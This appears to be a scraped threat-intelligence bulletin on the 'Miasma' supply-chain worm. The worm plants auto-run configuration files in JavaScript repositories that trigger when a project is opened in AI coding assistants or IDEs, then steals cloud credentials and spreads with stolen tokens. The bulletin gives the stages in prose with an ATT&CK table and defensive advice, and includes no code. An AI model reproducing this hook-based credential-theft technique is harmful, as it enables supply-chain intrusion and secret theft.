EXECUTIVE SUMMARY
An unidentified threat actor, tracked as the Miasma group, is running a supply‑chain campaign that abuses AI‑coding assistants and popular development environments. The campaign injects malicious code into open‑source JavaScript repositories hosted on a major code‑hosting platform, targeting organizations that rely on these libraries for web and cloud applications. Victims span software vendors, cloud service providers, and enterprises across North America, Europe, and Asia. The attacker’s primary objective is to harvest cloud credentials and other secrets, then use the stolen tokens to expand access and exfiltrate valuable data.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
An unidentified threat actor, tracked as the Miasma group, is running a supply‑chain campaign that abuses AI‑coding assistants and popular development environments. The campaign injects malicious code into open‑source JavaScript repositories hosted on a major code‑hosting platform, targeting organizations that rely on these libraries for web and cloud applications. Victims span software vendors, cloud service providers, and enterprises across North America, Europe, and Asia. The attacker’s primary objective is to harvest cloud credentials and other secrets, then use the stolen tokens to expand access and exfiltrate valuable data.[emaillocker id="1283"]
The worm is introduced through a forged commit that adds configuration files to the repository, each of which triggers an automatic command when a developer opens the project in an AI assistant or IDE. Once executed, a small loader fetches a lightweight runtime, decrypts a hidden module, and launches a credential‑harvesting engine that scans for cloud keys, API tokens, and repository secrets. The malicious code then writes the stolen data to attacker‑controlled repositories and uses any compromised personal access token to push the same payload into additional projects, maintaining a foothold across the supply chain.
The campaign is significant because it exploits trusted developer tools, making the infection appear benign until a repository is opened, which bypasses many traditional scanning solutions. Detection is difficult; the malicious scripts are hidden among legitimate configuration files and only activate in specific IDE contexts, while the exfiltrated credentials give attackers persistent access to cloud resources. Organizations should enforce strict code‑review policies for any auto‑run hooks, limit the scope of personal access tokens, monitor for unusual Git activity, rotate secrets regularly, and maintain offline backups. Deploying endpoint protection that can flag unexpected runtime downloads adds an additional layer of defense.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1195.002 | Supply Chain Compromise | Compromise Software Supply Chain |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Defense Evasion | T1027.005 | Obfuscated Files or Information | Indicator Removal from Tools |
| Credential Access | T1528 | Steal Application Access Token | — |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol | Exfiltration Over Unencrypted Non-C2 Protocol |
REFERENCES:
The following reports contain further technical details:
https://thehackernews.com/2026/06/miasma-worm-hits-73-microsoft-github.html
https://safedep.io/miasma-worm-ai-coding-agent-config-injection/